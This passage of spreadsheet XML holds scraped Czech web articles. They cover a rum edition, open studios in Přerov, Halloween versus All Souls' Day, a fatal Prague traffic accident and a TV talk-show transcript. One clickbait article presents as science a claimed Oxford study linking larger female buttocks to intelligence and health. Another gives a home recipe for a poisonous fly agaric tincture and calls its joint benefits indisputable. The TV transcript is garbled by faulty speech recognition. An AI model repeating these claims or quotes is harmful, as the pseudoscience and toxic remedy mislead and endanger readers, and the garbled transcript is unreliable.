destilátu. Colección Visionaria Edición 02 Coffee se vyznačuje tmavě jantarovou barvou se zlatými odlesky. Ve vůni se prosazují bohaté tóny karamelu a čerstvě připravené kávy, jež postupně ustupují aroma hořké čokolády a sladké vanilky, stejně jako jemným náznakům kouře. V ústech od počátečních tónů skořice, hřebíčku a muškátového oříšku přechází do jemných náznaků sušeného ovoce, než se naplno projeví intenzivní kávová chuť. Závěr patří tónům dubu a závanu kouře. Do ručně vyráběných 0,7l láhví, jež jsou pečlivě zapečetěné, opatřené modře zbarvenou Brugal síťkou, číslované a podepsané samotnou Jassil, se kávová edice plní naředěná na 45 % alkoholu . Colección Visionaria Edición 02 Coffee dohromady čítá necelých 35 000 láhví. Část z nich se dostala i na český trh, kde se prodávají za doporučenou cenu 2300 Kč. Autor: Bára Urbanová Autor person Bára Urbanová Rubrika transition_slide zaznamenáno</t>
  </si>
  <si>
    <t>367</t>
  </si>
  <si>
    <t>265</t>
  </si>
  <si>
    <t>20241101_228_3243606400_87edefb42e20b9aa3f80.html</t>
  </si>
  <si>
    <t>87edefb42e20b9aa3f80</t>
  </si>
  <si>
    <t>Sem se běžně nepodíváte. Otevřené ateliéry v Přerově lákají na prohlídky</t>
  </si>
  <si>
    <t>Sem se běžně nepodíváte. Otevřené ateliéry v Přerově lákají na prohlídky Akce se koná již pátým rokem, avšak Přerov se do ní zapojí vůbec poprvé. „Jsem rád, že se nám akci, která má svou tradici v Olomouci , podařilo rozšířit i do dalších měst v kraji. Je to příležitost nahlédnout do dílen a ateliérů, kam se obvykle veřejnost nedostane. Chceme tím ukázat, jaké šikovné tvůrce v našem kraji máme a zároveň je touto cestou podpořit,“ uvedl Tomáš Dostál, ředitel Inovačního centra Olomouckého kraje , jež akci pořádá. V Přerově a okolí budou moci zájemci navštívit například studio módní návrhářky Sandry Švédové, dílnu Adély Lakomé v Prosenicích , kde vzniká broušené sklo značky DOSENA, či architektonické studio na Velké Dlážce VESMĚS architekti. Vůbec poprvé se veřejnosti otevře také prostor v Pivovarské ulici, kde má v budoucnu vzniknout pivotéka propojená s výtvarným ateliérem spolku Výtvarka pro Velký. Přerovsko "Spolek Výtvarka pro velký vznikl z v loňském roce, protože nám v Přerově chybělo výtvarné vyžití pro dospělé. Začali jsme v Přerově organizovat vedené lekce akvarelu, kreslení v plenéru a další kreativní workshopy. Shánět na každou lekci volný prostor bylo ale docela složité, a tak jsme se začali poohlížet po něčem vlastním," líčí Eva Šinclová, zakladatelka Výtvarky pro velký. Vhodný prostor nakonec našla v Pivovarské ulici, v bývalé prodejně autodílů. "Prostory se nám líbily, a jelikož byly dostatečně velké, napadlo nás s manželem, že bychom to mohli spojit s pivotékou, o jejímž otevření v Přerově už dlouho přemýšlel," líčí. play_fill Přerovsko Pivotéka s výtvarným ateliérem je aktuálně stále v rekonstrukci. Během akce Otevřené ateliéry mohou lidé nahlédnout dovnitř, na vizualizacích se podívat na budoucí podobu prostoru, vyzkoušet si různé výtvarné techniky a ochutnat nebo si zakoupit craftová piva . Oficiální otevření je v plánu na přelomu listopadu a prosince. Kreativní prostory v Přerově bude možné navštívit v sobotu 2. listopadu od 13.00 do 18.00. Program Výtvarka pro velký pořádá výtvarné kurzy a workshopy pro dospělé se zkušenými lektory, kde si užijete kreativní prostředí a domů si odneste vlastnoručně vyrobené umělecké dílo. V Přerově připravují nový kreativní prostor propojený s Pivotékou, který budete moci poprvé navštívit během prvního ročníku Otevřených ateliérů. Výtvarka pro velký (vytvarkaprovelky.cz) Sandra Švédová je módní návrhářka, která vytváří nadčasové kolekce s minimalistickými liniemi a zaměřením na detail. Její inspirací jsou ženy, které obléká a které se stávají součástí každého jejího modelu. Pracuje s přírodními i high-tech materiály a důraz klade na propojení elegance s udržitelnou módou. (sandrasvedova.cz) Ateliér NASTONKU je květinářství, které se specializuje na výrobu jedinečných dekorací na míru podle přání zákazníků. Pracují s přírodními materiály a organizují workshopy na výrobu sezónních věnců a květinovou vazbu. Vytvářejí atmosféru domova a jsou tu pro všechny tvořivé duše, rádi sdílejí své nápady a tipy na dekorování. Stále ještě myslíte, že architekti jen vybírají barvičky na fasády? Ale kdepak. Architekti mají klíčovou roli ve vytváření prostoru a řeší projekty různých měřítek – od detailu lavičky po nové městské čtvrti. Takovou barvitost tvorby si můžete prohlédnout a prodiskutovat i s přerovským architektonickým týmem. (vesmes.cz) Folklorní soubor Haná Přerov se věnuje folkloru a tradicím Přerovska a Hané . Pořádají akce, starají se o kroje a zachovávají lokální odlišnosti, které jsou pro Přerov typické. Během Otevřených ateliérů představí krojovnu, proběhnou ukázky vyšívání a péče o kroje, a také originální tisky ze zaniklé přerovské látkové Bajerovy tiskárny. (hanaprerov.cz) „Najdi sklenku v kupce sena!“ Tak by se dala popsat tvorba značky Dosena, za kterou stojí Adéla Lakomá, která se zabývá ruční výrobou skla dekorovaného gravírováním. Design je často inspirován zemědělskými a přírodními materiály. Ve své dílně v Prosenicích Adéla dekoruje každou sklenku, vázu, či mísu, jako jedinečný a neopakovatelný kus. Dosena | Facebook V rámci prvního ročníku Otevřených ateliérů proběhne v přerovském IN-HUBu v 18:30 křest Katalogu DESIGN: Kreativní Prostějov a Přerov , mapujícího kreativce regionu. Slavnostní křest již šestého katalogu edice DESIGN, tentokrát s podtitulem Kreativní Prostějov a Přerov . Katalog mapuje a prezentuje elitní tvůrce z kreativních odvětví tohoto regionu. close info Zdroj: se souhlasem ICOK zoom_in Otevřené ateliéry Přerov 2024 Autor: Marie Sehnálková Autor person Marie Sehnálková</t>
  </si>
  <si>
    <t>8109.999999999999</t>
  </si>
  <si>
    <t>6220</t>
  </si>
  <si>
    <t>20241101_229_3243751169_9e690ebe8ded47e55e8f.html</t>
  </si>
  <si>
    <t>9e690ebe8ded47e55e8f</t>
  </si>
  <si>
    <t>Vědci našli souvislost mezi velikostí ženského pozadí a inteligencí. Budete se divit!</t>
  </si>
  <si>
    <t>Vědci našli souvislost mezi velikostí ženského pozadí a inteligencí. Budete se divit! close Větší zadek je pro spoustu lidí symbolem plodnosti a ženské krásy. Nyní se ale ukázalo, že větší pozadí může souviset také s inteligencí. Tušíte jak? Větší pozadí Spousta žen majících větší zadek se trápí, že nejsou dostatečně krásné a měly by zhubnout. Přitom mužům se tato část ženského těla, pokud je větších rozměrů, většinou líbí. Pokud také patříte k ženám, které celý život řeší své plnější křivky a neustále přemýšlí, jak se jich zbavit, přestaňte se trápit. A začněte si své křivky konečně užívat. Důvodem je studie, se kterou přišli vědci z oxfordské univerzity. Ti zjistili, že větší zadek je nejen symbolem sexappealu, který ženám jednoznačně sluší, ale také, že ženy s větším pozadím jsou zdravější a inteligentnější. Podívejte třeba na famózní Jennifer Lopez . Je krásná, úspěšná a inteligentní. A nalijme si čistého vína , je radost na ni pohledět. Výzkum, který provedli vědci z oxfordské univerzity, zkoumal, jaký vliv má na ženské tělo a celkové zdraví větší zadeček. Do studie bylo zapojených přibližně 16 000 žen s různými velikostmi pozadí. Výsledky vás překvapí Vědci zjistili, že větší pozadí má celou řadu benefitů. Pokud má žena normální váhu a k tomu vlastní větší zadeček, má v těle dostatečné množství důležitých hormonů. Důvodem je vyšší procentu tuku vyskytující se v této partii těla. Proč některé ženy mají větší pozadí? Zdroj: Youtube Tuk je hlavním producentem tělu nezbytných hormonů, který pomáhá se zpracováním některých výživných látek. Ženy s větším zadečkem jsou více rezistentní vůči špatnému neboli LDL cholesterolu a více tuku v zadečku je chrání před vysokou hladinou cukru v krvi. Takové ženy se podle odborníků nemusí být nemocí, jako je cukrovka nebo komplikací s ní spojenými. Hormony produkované díky tuku obsaženém v zadečku je také chrání proti kardiovaskulárním chorobám a vzniku zánětů v těle. Ženy mající větší pozadí se také podle vědců dožívají vyššího věku, než ženy mající malé pozadí. Větší zadeček ale souvisí také s dalším důležitým faktem. gallery 4 Tím je vyšší kvocient inteligence. Mohou za to omega-3 mastné kyseliny, k jejichž produkci za takových podmínek, jakými je větší pozadí, dochází snáze, než u hubených žen. Omega 3 podporují činnost mozku a díky tomu jsou ženy s větším zadečkem inteligentnější, než ženy, které větší pozadí nemají. Rubrika transition_slide Magazín</t>
  </si>
  <si>
    <t>20241101_23_3264908571_2391ea2b20194554cabc.html</t>
  </si>
  <si>
    <t>2391ea2b20194554cabc</t>
  </si>
  <si>
    <t>Halloween nebo Dušičky? U brněnských studentů stále ještě vítězí tradice Dušiček</t>
  </si>
  <si>
    <t>Halloween nebo Dušičky? U brněnských studentů stále ještě vítězí tradice Dušiček 1. listopadu 2024 • 21:00 Homepage Brno - Barevné kostýmy, namalované tváře, spousta alkoholu a hlasitá hudba nebo tradiční den strávený s rodinou zdobením hrobů a vzpomínáním na ty, co už tu s námi nejsou. I když halloweenské party jsou každým rokem mezi studenty více populární, tak tradice slavení Památky zesnulých je pořád v brněnských studentech zakořeněná. „I když plánuji jít na halloweenskou party, tak jsou pro mě Dušičky pořád tradicí času stráveného s širší rodinou. Kdy zavzpomínáme na ty, kteří už v našich životech nejsou, a navíc se jako rodina sejdeme, což se tak často nestává,“ říká Kristýna Jiránková studentka Filozofie na Masarykově univerzitě . Halloween, jehož název je odvozen od „All Hallow´s Eve“, tedy „předvečer Všech svatých“, se slaví 31. října. Pochází z Irska , kde se v tento den slavil Samhain neboli pohanský svátek, který oslavoval konec léta a prolínal se při něm svět živých a mrtvých. Věřilo se, že v noci z 31. října na 1. listopad se domů vracejí duše zemřelých a hledají pomoc příbuzných, aby mohli zpět do země mrtvých. Aby duchové nezabloudili, lidé jim svítili svítilnami z vydlabaných řep, místo nichž se později začaly používat dýně. Lidé se také převlékali do starých hadrů a malovali si obličeje, což se také zachovalo dodnes v podobě kostýmů. Vystěhovalci zvyk přenesli v 19. století do USA , kde se všeobecně rozšířil, a odtud ho s expanzí americké kultury přejímaly další země. Počátkem 20. století se svátek komercializoval. Od třicátých let začíná být populární nošení kostýmů a kolem roku 1950 se v USA objevuje koledování po domech, které v 80. letech proniklo i do Británie , a pak dále do Evropy , dokonce až do České republiky . „Mně osobně se Halloween moc nelíbí, ale rozumím, že pro někoho může být zajímavý. Přijde mi, že jde spíš o komerční svátek. Lidé často nakupují spoustu dekorací, kostýmů a sladkostí, což je fajn, pokud k tomu člověk přistupuje udržitelně a nepřehání to. Dušičky jsou mi bližší. Myslím, že je důležité uctít památku zesnulých, zamyslet se nad tím, co pro nás ti, kteří mezi námi už nejsou, znamenali a možná si na ně zavzpomínat s rodinou,“ vysvětluje Alžběta Zavřelová, studentka Mendelovy univerzity . V Česku se slavení Halloweenu zastavilo u vyřezávání dýní, výzdoby domů a kostýmových party, kdežto v Americe a Británii jsou celé oslavy postavené na „trick or treat“ neboli koledování dětí oblečených v kostýmech o sladkosti, kde při neotevření dveří není neobvyklé najít další den pastu na dveřích, vajíčka na autě anebo stromy obalené toaletním papírem. V některých městech dokonce soutěží o dům s nejstrašidelnější výzdobou. „Halloween vůbec neslavím a ani mi nepřijde, že to má takový význam tady v Česku, jaký já bych si představovala. Kdyby se to tady slavilo jako třeba v Americe , mělo by to pro mě větší kouzlo než jen jít v nějakém kostýmu na párty. Klasičtější svátek u nás jsou Dušičky, u kterých se musím přiznat, že už taky doma neslavíme, tak jako dřív. Vždy jsme se sešli ve více lidech a obešli všechny hřbitovy, kam jsme donesli nějakou kytici nebo věnec a svíčku. Poslední roky spíše zapálíme svíčku z domova a vzpomínáme na ty naše blízké, co odešli. Ať už lidský nebo zvířecí,“ sdílí Agáta Staňková, studentka Veterinární univerzity v Brně . Hlubší význam má v Česku Svátek zesnulých, který všichni známe pod názvem Dušičky. Slaví se 2. listopadu, den po Slavnosti Všech svatých. Právě v tento den si připomínáme zemřelé příbuzné či blízké osoby, lidé navštěvují hřbitovy, vzpomínají na ty, kteří už tu s námi nejsou, pokládají na hrob květiny a zapalují svíčky. „Jako malý jsem dušičky míval moc rád. Můj děda byl velmi křesťansky založený a my jsme vždy jezdívali k němu, abychom obešli hřbitovy, zapálili svíčky a upravili hroby a vzpomněli na zesnulé. Líbilo se mi chodit ve tmě a pozorovat jen svítící svíčky. Mělo to takovou tajuplnou atmosféru, když už byla tma tak brzy, častokrát bylo zataženo nebo mlha. Připadá mi to jako důležitý svátek, u kterého se většinou sejde celá rodina a vzpomíná na zesnulé, připomíná si jejich skutky a udržuje si je stále v paměti. Halloween jsme nikdy moc neslavili, protože to není tradiční český svátek a spíš,,náplava' ze zahraničí, ale několikrát jsem na chatě vyřezával dýně a to byla super zábava na odpoledne.“ vzpomíná student Kyberbezpečnosti Jakub Čada. Památku věrných zemřelých zavedl roku 998 opat z Cluny , sv. Odilo († 1048), který se snažil pokřesťanštit pohanskou tradici svátku Samhain . Z Cluny se svátek šířil po klášterech dál do světa, až ho v 10. století oficiálně zavedl papež Benedikt XV. Sdílet V noci z úterý na středu zůstal brněnský hudební klub Alterna otevřený podstatně déle než obvykle. Studenti Masarykovy univerzity , převážně oborů politologie,... 6. listopadu 2024 • 07:43 Založila si profil na sociálních sítích s názvem @tojesmrt, kde se věnuje v naší společnosti stále dost tabuizovanému tématu – smrti. Anastasija Kriušenko je... 5. listopadu 2024 • 21:46 5. listopadu 2024 • 16:12 O nás Stisk online je studentský multimediální zpravodajský deník tvořený studenty Katedry mediálních studií a žurnalistiky z Fakulty sociálních studií Masarykovy univerzity Brno v rámci studia jako cvičné médium. Stisk vznikl jako cvičné médium pro studenty už v roce 1997, kdy byl jedním z prvních internetových časopisů v České republice . Na portálu zájemci najdou studentský deník Stisk Online, Rádio Stisk, TV Stisk a také výstupy některých dalších žurnalistických kurzů (s přesahem na sociální sítě). Cílem multimediální dílny je simulace redakčního prostředí, každý student si tak může vyzkoušet všechny základní role při výrobě online zpravodajského či publicistického obsahu i související působení na sociálních sítích a připravit se tak na praxi v různých typech médií. twitter facebook instagram youtube Tiráž Tiskové zprávy a náměty pro tvorbu žurnalistických materiálů pro Online Stisk, Rádio Stisk a TV Stisk zasílejte pouze na e-mail: Všechny žurnalistické materiály jsou zveřejněny podle stejných pravidel jako na kterémkoliv jiném zpravodajském serveru nebo například v novinách, rozhlasovém nebo televizním zpravodajství. Mazání už zveřejněných žurnalistických příspěvků (ani jejich částí) v jakékoli formě není možné nyní ani v budoucnu. Adresa Katedra mediálních studií a žurnalistiky, Fakulta sociálních studií MU, Autor: Klára Bašeová Autor person Klára Bašeová Rubrika transition_slide Homepage</t>
  </si>
  <si>
    <t>1400</t>
  </si>
  <si>
    <t>483000</t>
  </si>
  <si>
    <t>20241101_230_3243567802_79857d7bdfb5a3db61f2.html</t>
  </si>
  <si>
    <t>79857d7bdfb5a3db61f2</t>
  </si>
  <si>
    <t>Muchomůrka červená nemusí zůstat v lese. Poslouží na bolavé klouby</t>
  </si>
  <si>
    <t>Muchomůrka červená nemusí zůstat v lese. Poslouží na bolavé klouby 01. 11. 2024 Novinky Zajímavosti Muchomůrka červená patří mezi nejznámější houby, o kterých se ví, že je jedovatá. Pokud máte bolavé klouby, můžete ji sbírat i tak! Při sběru ale nepoužívejte stejný nůž, jakým odřezáváte jedlé houby a samozřejmě muchomůrky ukládejte do zvláštní nádoby (košíku). Při manipulaci s muchomůrkami buďte velmi opatrní, protože může být riziková. I když je jedovatá jen mírně, stále je nebezpečná. Muchomůrka je jedovatá Příznaky otravy muchomůrkou jsou zejména zmatenost, nepozornost, nevolnost, halucinace, poruchy vědomí nebo dokonce hysterie. Požití příliš velkého množství houby může být smrtelné. Své využití ale může mít muchomůrka v domácích mastích a tinkturách na bolavé klouby, které se používají výhradně zevně! Po každé manipulaci s produktem z muchomůrky si musíte důkladně omýt ruce. A samotný produkt byste měli samozřejmě uchovávat tak, aby se k němu nedostaly nepovolané osoby. Foto: Unsplash Výroba, uchovávání i používání jsou nebezpečné Zatímco účinky muchomůrky na klouby jsou nesporné, všechny fáze (od sběru až po užití) nesou rizika. Laik si jen těžko může stanovit bezpečné množství houby a dávkování, podobně jako u léčivých bylin. Jed z houby se může do lidského těla dostat i prostřednictvím tinktur a mastí. Přitom, aby byl přípravek dostatečně účinný, závisí také na samotném stáří houby. Muchomůrka a výroba tinktury Tinktura z muchomůrky se používá zevně na bolestivé a ztuhlé klouby či při artritidě. Používají se muchomůrky, které ještě nejsou zcela rozvinuté. Jejich klobouky nakrájejte na kousky a dejte do zavařovací sklenice. Zalijte lihem nebo vysokoprocentním alkoholem . Nechte macerovat na světlém místě po dobu několika týdnů (cca jeden měsíc) – čas od času obsahem protřepejte. To, že je hotovo, poznáte podle toho, že houby předají svou červenou barvu (a obsahové látky) do lihu. Poté sceďte a uchovávejte v malých lahvičkách v chladu a temnu. Použití tinktury Tinkturu si označte, aby bylo jasné, že ji nemůžete užívat vnitřně. Můžete ji používat ve formě obkladu, kdy tinkturu nanesete na gázu nebo hadřík, který následně přiložíte k bolestivé oblasti. Převažte čistou gázou nebo obvazem. Nechte působit několik hodin (nebo přes noc), poté obklad vyměňte. Používejte podle potřeby – po několika týdnech si ale udělejte přestávku. Mezi jednotlivými převazy aplikujte na pokožku bylinnou mast (ideálně takovou, která také podporuje hojení kloubů – například kostival či mast z včelího vosku). Zdroje info: https://www.provonenyden.cz/tinktura-z-muchomurky-cervene/ https://melnicky.denik.cz/zpravy_region/muchomurka-cervena-mast-tinktura-klouby-riziko-mykolog-melnicko.html Autor: Jana Šmatlavová Autor person Jana Šmatlavová</t>
  </si>
  <si>
    <t>7290</t>
  </si>
  <si>
    <t>20241101_231_3244312239_fa6581d7e465b36d8c1b.html</t>
  </si>
  <si>
    <t>fa6581d7e465b36d8c1b</t>
  </si>
  <si>
    <t>Tragédie v Praze: Seniorka nepřežila srážku s nákladním autem</t>
  </si>
  <si>
    <t>Tragédie v Praze : Seniorka nepřežila srážku s nákladním autem Simona Knotková Zdroj: Freepik V pátek ráno došlo v Praze k tragické nehodě. Nákladní auto srazilo seniorku, která i přes rychlý zásah záchranářů na místě zemřela. Policie okolnosti vyšetřuje. Praha se v pátek ráno stala dějištěm tragické dopravní nehody. V Prosecké ulici v Praze 9 došlo ke střetu nákladního vozidla s chodkyní, která bohužel svým zraněním na místě podlehla. Policejní mluvčí Kristýna Zelinková uvedla, že nehoda se odehrála kolem osmé hodiny ranní. Obětí nehody byla přibližně pětasedmdesátiletá žena. Záchranáři po příjezdu na místo okamžitě zahájili resuscitaci. Navzdory jejich maximálnímu úsilí, které zahrnovalo zajištění dýchacích cest a podání léků, se život ženy nepodařilo zachránit. Záchranná služba na sociální síti X informovala, že vzhledem k povaze zranění žena zemřela přímo na místě nehody. Policie nyní vyšetřuje přesné okolnosti této tragické události. Podle dosavadních zjištění byl u řidiče nákladního vozidla proveden test na přítomnost alkoholu v dechu, který byl negativní. Další podrobnosti o nehodě zatím nejsou známy. Rubrika transition_slide Praha</t>
  </si>
  <si>
    <t>11540</t>
  </si>
  <si>
    <t>9160</t>
  </si>
  <si>
    <t>20241101_232_3243686677_e511c8747c0d94a90656.html</t>
  </si>
  <si>
    <t>e511c8747c0d94a90656</t>
  </si>
  <si>
    <t>Sama doma: 1. listopadu</t>
  </si>
  <si>
    <t>Sama doma: 1. listopadu Výduť břišní aorty — Albert Černý — Michal Vaniš a Romana Bočková — Jan Miňha — Václav Chaloupek — Kateřina Tučková -Pohodové páteční odpoledne, je půl jedné, a to je čas na první listopadové vysílání Sama doma. Dnes se pokusíme nabídnout skvělé způsoby, jak si odpočinout od tzv. on-line světa. Ať už to budou dobré knihy, oblíbená hudba nebo třeba zvířata. -Hned v úvodu přivítáme jednu z nejčtenějších a nejúspěšnějších českých autorek současnosti, spisovatel, dramatik, publicistku a historičku umění Kateřinu Tučkovou . Povídat si budeme nejen o její tvorbě, ale třeba i o tom, jaký je jako spisovatelku ovlivnilo mateřství. -Pamatujete na seriál Mé dějové? Nebo vám učarovaly třeba Madla a ťap. Dnes přivítáme oblíbeného tvůrce večerníčků a známého znalce přírody, budeme se bavit nejen o zvířatech se kterými natáčela lépe zveme na festival Kniha Brno. -Je známo že terapie pomocí zvířat je velmi pozitivní na fyzickou i psychickou stránku člověk. Věděli jste ale o to, že v tomto směru mohou pomáhat i papoušci? Ano, slyšíte dobře. Dnes vás o tom přímo ve studiu přesvědčí. A to pomocí průkopníků v papouščí terapii. -No a do vysílání dnes přijal pozvání také zpěvák Albert Černý , frontman skupiny Lake Malawi . Právě dnes ČT čest Odvysílá záznam koncertu k desetiletému výročí. -Dobrý den. -Když se premiér a televizního vysílání hodinku po hodině funkce blíž, nejste nervózní? -Trošku ano. Zajímalo by mě kolik to bude sleduje rád lidí. Často ty živé koncerty se na ně dívá tolik lidí, jako třeba když pětkrát za sebou vyprodáte halu. Takže je to svým způsobem skvělé. -Tak my doufáme, že prostřednictvím našeho vysílání jich ještě několik přibyde tři My dnes budeme mít velkým tématem také knihy. Je nějaká kterou si rád otevřete vy? -No já jsem se úplně zaradoval, že paní Kateřina je tady dneska. Protože jsem Žitkovské bohyně četl a strašně se mi to líbilo. Potom jsem se vydal na ta místa a chodil po kopcích a představoval si ty bohyně. Jsem rád že je tady s námi. -To je krásné setkání. Prozradím že Albert Černý nám dnes ve studiu živě zazpívá. Kromě toho bude dnešní vysílání hostem na chatu, ptejte ho společně s námi. Odkaz na chat najdete na stránkách ČT u našeho pořadu. -S Albertem se určitě dostaneme k tomu jak důležité je trávit čas tzv. off-line. Koneckonců to by mohla být dnešní inspirace. Dejte nám vědět jak trávíte čas off-line. Napište nám na adresu kterou vidíte na obrazovce. -My si určitě vaše odpovědi přečteme a v závěru jednu vylosujeme. Výherci si odnesou dvě knihy. Kniha Václava Chaloupky Chvilky v přírodě a také Žitkovské bohyně od Kateřiny Tučkové , která už jasná my v tuto chvíli ve studiu a jsme moc rády že začneme vysílání právě s ní. -S knihou Bílá Voda se prý trápila 10 let. Během té doby se navíc stala dvojnásobnou maminkou. A o to víc jí určitě těšilo, že se právě tento dlouho vznikající román stal nejprodávanější knihou roku 2022. A navíc získal i státní cenu za literaturu. My jsme moc rád, že pozvání do pátečního vysílání Sama doma přijala spisovatelka Kateřina Tučková . Pěkné odpoledne, vítejte. -Dobrý den. Děkuji za pozvání. -Ženy a, to je popis románu Bílá Voda, vydaného ve velkých nákladů. Proč u veřejnosti tolik rezonoval? -Já si trošku jako ostýchám o tom mluvit, já myslím že to by měl jako definovat nějaký literární kritik nebo recenzent. Ale mám samozřejmě obrovskou radost, že se ta knížka tolik četla. Já sám si to vykládám, vlastně, stejně jako svou fascinaci, i třeba tím že se to ostatním lidem chtělo číst. Já jsem vlastně byla fascinovaná tím, že jsem narazila na příběh, o kterém se nevědělo. Který nepatřil do obecného povědomí. Příběh řeholnic které byly perzekvovány v rámci akce Ř. Propojila jsem s tím příběh moravské podzemní církve, který byl nějakým způsobem známý. Ale rozhodně nepronikl do širších vrstev, širšího povědomí. Tedy to, že vlastně v Československu za dobu komunistického režimu došlo ke svěcení žen na katolické kněze. Právě, to aby mohli pomáhat ženám, které se ocitli v nějakých kritických životních situací, jako byly buď vězeňkyně nebo řeholnic, právě v internačních klášterů. Takže jako... jsem ráda, že ta moje fascinace tím tématem se nějak jako přenesla i načtená. -Přestože to vlastně vůbec není mainstreamové téma... to je úžasné. -Je to vlastně jednak jako velice okrajové téma a druhak si myslím, že se to čtenáři nějak neuskladňuje. -Vtáhla jsem tam spoustu materiálu které jsem během pátrání po příbězích náš, tož jsou svodky tajemník, agentů StB , čili věci které nejsou úplně jednoduše čitelné. Ale doplňují důležitě vlastně celý vlastně ten příběh. Takže pro mě byly neodmyslitelné, v tom text. A čtenáři to přesto přijali, tak to mám radost. -Tak tím že ta tvorba trhala takové rok, že jste si na tom dala záležet. -Trvala rok. Také protože bylo strašně těžké najít správný způsob jak to povyprávět. To se mi dvakrát nezdařilo. Druhá verze měla 800 stran a musela jsem se s ní rozloučit. Protože to vlastně nešlo sklenout do toho konce. Až napotřetí se to podaří. No a mezitím ty dvě děti... -To jsem se právě chtěla zeptat. To byla asi časová podpásovka? -Časová ano. Ale plánovaná a radostná, samozřejmé. A mám jako štěstí, že mám kolem sebe fungující zázemí. Manžela a rodiče, kteří mi výrazně pomohly právě k tomu, abych to mohla dokončit. -Bílá Voda je v Jeseníkách. Chtěli jsme se zeptat, jestli vy vlastně máte nějaký osobní vztah k té lokalitě? -Dřív jsem tolik neměla. Znala jsem to jako míst, kam jsem párkrát vyrazila vlastně na nějaké krátké prázdninové pobyty. Ale během tedy psaní knihy Bílá Voda, které trvalo 10 let, tak jsem tam jezdila opakovaně. Nejen do Bílé Vody, ale projít rychle by a Jesenicko. Strašně jsem k tomu přidal nula, vlastně když v září vypukly povodně, a to místo dostala takovou ránu, tak mě to zasáhlo také. A doteď tam mám... přátelé, jsme na sebe napojení... velice jsou soucítím s tím co se tam stalo je to kraj který mi přirostl k srdci. -Při psaní jste se věnovala jiným věcem... a pracem, myslí. Bylo to kontraproduktivní, dá se to tak říct? -No já jsem vlastně vystudovaná historička umění. Organizovala jsem výstavy. K tomu jsem organizovala kulturní festival. Pak se ale ukázalo že už to všechno nejde kloubit dohromady. Do jisté doby mě to velice dobře doplňovalo ty potřeby. Protože to psaní je taková velice soukromá záležitost. Člověk je sám se sebou, s počítačem, s materiály o kterých dlouho s nikým nemluví. Je to taková tichá a osamělá práce, to psal. A ten svět výtvarného umění byl zase živelný. Já jsem pracovala s autory své generace. Se kterými jsme mohli konfrontovat názory na společnost, politiku... vůbec současný svět. To bylo takové jako dobré doplnění. No ale pak se ukázalo, že společně s cestováním, vlastně s překlady těch knih na zahraniční festivaly, že už to vlastně nejde utáhnout všechno dohromady. No tak je mi to líto. Ale bohužel jsem si musela vybrat... vybrala jsem si tady literární tvorbu. -Se spisovatelkou Kateřinou Tučkovou se rozhodně ještě neloučí. Budeme se těšit na další povídání. Kdy se ještě zeptám, jestli má při psaní nějaké rituály? Výduť břišní aorty. Takové je zdravotní téma dnešního vysílání Sama doma. Proč vlastně takové výdutě vznikají? A proč se tomuto problému přezdívá tichý zabiják. To zodpovím s cením specialistou panem doktorem Robertem Vlachovský. Pěkně od pole, ne vítejte u nás ve vysílání. -Pěkné odpoledne. -Aorta obecně se označuje jako srdečnice. A je to nejdelší tepna v našem lidském těle. K čemu ale konkrétně slouží? Můžete nám to popsat? -Je to opravdu vlastně největší tepna. Odvádí okysličenou krev ze srdce, vlastně do celého těla. Dá se říci, začíná hned za srdíčkem. Jako kořen aorty, a potom vzestupná aorta, oblouk a sestupná aorta. Dneska se asi budeme bavit o sestupné aortě, a má část břiše, od ní odstupují větve které postupně zásobují orgány jak v těle jsou. Od hlavy, horních končetin, všech orgánů v břiše, dolních končetin, to všechno má na starosti v uvozovkách břišní aorta. -Řekněte mi, jestli pokud moje aorta je v pořádku, jestli jí nějak vnímám? Cítím i já - zdravý člověk - ve svém těle? -Pokud je v pořádku, tak i nějak nevnímá. Většinou se nějak projevuje, až pokud je z ní něco. -A proč tedy Kvídu tím dochází? Co je příčinou? -To je hodně těžká otázka... Dřív se myslelo, že je to v podstatě způsobené aterosklerózou. Což je jiný proces, který probíhá v cévách a který je obecně známý. Ale teď se především mluví o poruše pojiva. Která vlastně způsobuje oslabení stěny. A v některých typických místech v tom cévním systému - což je třeba břišní aorta - dochází k tak velkému oslabení cévní stěny, že se postupně ta tepna začne rozšiřovat. Našem případě břišní aorta. A mluvíme od nějaké velikosti už o výduti. To je zhruba u většiny dát kolem tří cm. Čili do těch tří cm je to tzv. v pořádku nebo je to ke sledování. Od tří cm můžeme hovořit o rozšíření břišní aorty. -Na mě to slovo výduť působí jako něco hmatatelného. Poznám to pohmatem? -U hubených pacientů... některých typů, takových těch somatických typů, kde to vidíte, tak tam samozřejmě ano. Můžete si nahmatat i sami. Ne pokaždé, když si člověk něco pulzujícího na břiše nahmatá něco pulzujícího, takže má výduť, to neznamená. Když je extrémně člověk hubený. Ale někdy se dá opravdu nahmatat břišní aorta a její pulz. -Které skupiny lidí jsou největší ohrožené tímto zdravotním problémem? -Pokud se podíváme... ono se to zčásti překrývá s těmi rizikovými fakt. Ale nejvíce jsou ohroženi muži nad 65 let. V tom jsou rizikové faktory jako pokročilý věk, mužské pohlaví. Potom kuřáci. Pacient, ti kteří mají vysoký krevní tlak. A to je asi, takové ty hlavní faktory. Které vlastně způsobují, rizikové faktory které se spolupodílejí na vzniku té výdutě. -To vlastně všechno souvisí s životním stylem. Může být taková věc ale i vrozená? -Vrozená ve slova smyslu, že by se někdo narodil s výdutí břišní aorty, takto úplně není možné. Ale část těch chorob, které způsobí obecně oslabení pojivá - jsou to některé specifické syndromy, které jsou právě vrozené - tak mohou být právě nám dány už v genetickém kódu. A u těchto lidí se obzvlášť pozorně musíme soustředí na tu aortu a sledovat tyto věci. -O malých výdutích v podstatě asi pacient nemusí ani vědět? Kdy tedy zbystřit? Kdy mohou být tedy vlastně problémem a kdy to začít řešit s odborníky? -Problémem je... nebo jak jste to i zmiňovali... tichý zabiják. Je v tom, že pokud ta výduť začne růst, tak mi to nějak nepoznám. Ani pokud je rozšířená. Problém je v okamžiku až když se to nějak komplikuje. A tou největší komplikací je samozřejmě prasknutí té výdutě. Ty malé výdutě z velké části nedělají žádné velké problémy. Dokonce i tedy... ty výdutě, které jsou kolem 7-8 cm, to už jsou velké výdutě. A pokud nemají příznaky z toho prasknutí, tak ten pacient o tom vůbec nemusí vědět. Nejčastěji se na to přijde při rutinním vyšetření, třeba ultrazvukem. Z jiného důvodu. Například když při tom vyšetření se zdá, že ta auta je třeba rozšířená. -Jaké to jsou ty první příznaky? Jak je řešíme? O tom všem se budeme bavit už asi tak za půl hodiny. Pokud vás cokoli k tomuto tématu zajímá další, tak nám určitě napište na Brno . Sama doma. ČT. C. Můžete zavolat na telefonní číslo které vidíte na obrazovce. Tam můžete položit svůj dotaz a v závěru vysílání co 